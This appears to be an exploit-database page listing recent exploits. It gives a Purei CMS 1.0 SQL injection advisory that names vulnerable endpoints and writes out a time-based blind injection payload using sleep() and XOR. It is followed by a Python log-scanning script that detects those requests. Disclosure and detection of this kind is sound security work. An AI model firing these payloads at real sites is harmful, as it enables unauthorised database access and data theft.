
10 changes to exploits/shellcodes/ghdb RouterOS 6.40.5 - 6.44 and 6.48.1 - 6.49.10 - Denial of Service Siklu MultiHaul TG series < 2.0.0 - unauthenticated credential disclosure Dell Security Management Server <1.9.0 - Local Privilege Escalation Asterisk AMI - Partial File Content & Path Disclosure (Authenticated) Broken Access Control - on NodeBB v3.6.7 liveSite Version 2019.1 - Remote Code Execution Purei CMS 1.0 - SQL Injection Workout Journal App 1.0 - Stored XSS WinRAR version 6.22 - Remote Code Execution via ZIP archive
# Exploit Title: Purei CMS 1.0 - SQL Injection
# Date: [27-03-2024]
# Exploit Author: [Number 7]
# Vendor Homepage: [purei.com]
# Version: [1.0]
# Tested on: [Linux]
____________________________________________________________________________________

Introduction:
An SQL injection vulnerability lets an attacker modify backend SQL statements by manipulating
user input. It occurs when a web application inserts user input directly into an SQL statement
without effectively filtering out hazardous characters.

This could jeopardize the integrity of your database or reveal sensitive information.
____________________________________________________________________________________

Time-Based Blind SQL Injection:
Vulnerable files:
http://localhost/includes/getAllParks.php
http://localhost/includes/getSearchMap.php

Make a POST request with the value of the am input set to:

if(now()=sysdate(),sleep(9),0)/*'XOR(if(now()=sysdate(),sleep(9),0))OR'"XOR(if(now()=sysdate(),sleep(9),0))OR"*/

Make sure to URL-encode the inputs.

SQL injection:
Method: POST request

Vulnerable file:

/includes/events-ajax.php?action=getMonth
Data for the POST request:
month=3&type=&year=2024&cal_id=1[Inject Here]
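
A detection sketch for the requests described above, added here and not part of the original advisory: it scans a request log for POSTs to the three endpoints and flags watched parameters that are not plain integers or that carry SQL syntax, noting when the response was also delayed. The tab-separated log layout, the 5-second threshold and the assumption that month, year and cal_id are integers are assumptions, and the sample log lines are constructed.

```python
import re
from urllib.parse import parse_qs, urlsplit

# Endpoints and parameters named in the advisory; everything else is assumed.
WATCHED = {
    "/includes/getAllParks.php": ("am",),
    "/includes/getSearchMap.php": ("am",),
    "/includes/events-ajax.php": ("month", "year", "cal_id"),
}
NUMERIC = {"month", "year", "cal_id"}  # assumed to be integers in normal use
SQL_TOKENS = re.compile(r"\b(?:sleep|sysdate|now)\s*\(|\bxor\b|/\*|['\"]", re.I)
SLOW_SECONDS = 5.0  # assumed threshold, tune to the site's normal latency

# Constructed sample log: time, method, URL, seconds taken, POST body (tab-separated).
SAMPLE_LOG = "\n".join([
    "2024-03-27T10:00:01Z\tPOST\t/includes/events-ajax.php?action=getMonth\t0.04\tmonth=3&type=&year=2024&cal_id=1",
    "2024-03-27T10:00:05Z\tPOST\t/includes/getAllParks.php\t9.03\tam=if%28now%28%29%3Dsysdate%28%29%2Csleep%289%29%2C0%29",
    "2024-03-27T10:00:20Z\tPOST\t/includes/events-ajax.php?action=getMonth\t0.05\tmonth=3&type=&year=2024&cal_id=1%5BInject+Here%5D",
    "2024-03-27T10:00:31Z\tPOST\t/index.php\t0.02\tq=sleep%289%29",
])


def scan(log_text):
    """Return (timestamp, path, reasons) for each suspicious request."""
    findings = []
    for line in log_text.splitlines():
        stamp, method, url, seconds, body = line.split("\t", 4)
        path = urlsplit(url).path
        if method != "POST" or path not in WATCHED:
            continue
        params = parse_qs(body, keep_blank_values=True)  # also URL-decodes values
        reasons = []
        for name in WATCHED[path]:
            for value in params.get(name, []):
                if name in NUMERIC and not re.fullmatch(r"[0-9]+", value):
                    reasons.append(f"{name}: not an integer")
                if SQL_TOKENS.search(value):
                    reasons.append(f"{name}: SQL syntax in value")
        if reasons and float(seconds) >= SLOW_SECONDS:
            reasons.append("response delayed")
        if reasons:
            findings.append((stamp, path, reasons))
    return findings


if __name__ == "__main__":
    for finding in scan(SAMPLE_LOG):
        print(finding)
```

The integer check catches the third sample line even though it contains no SQL keyword, which is why allowlist validation of cal_id is a stronger control than keyword matching.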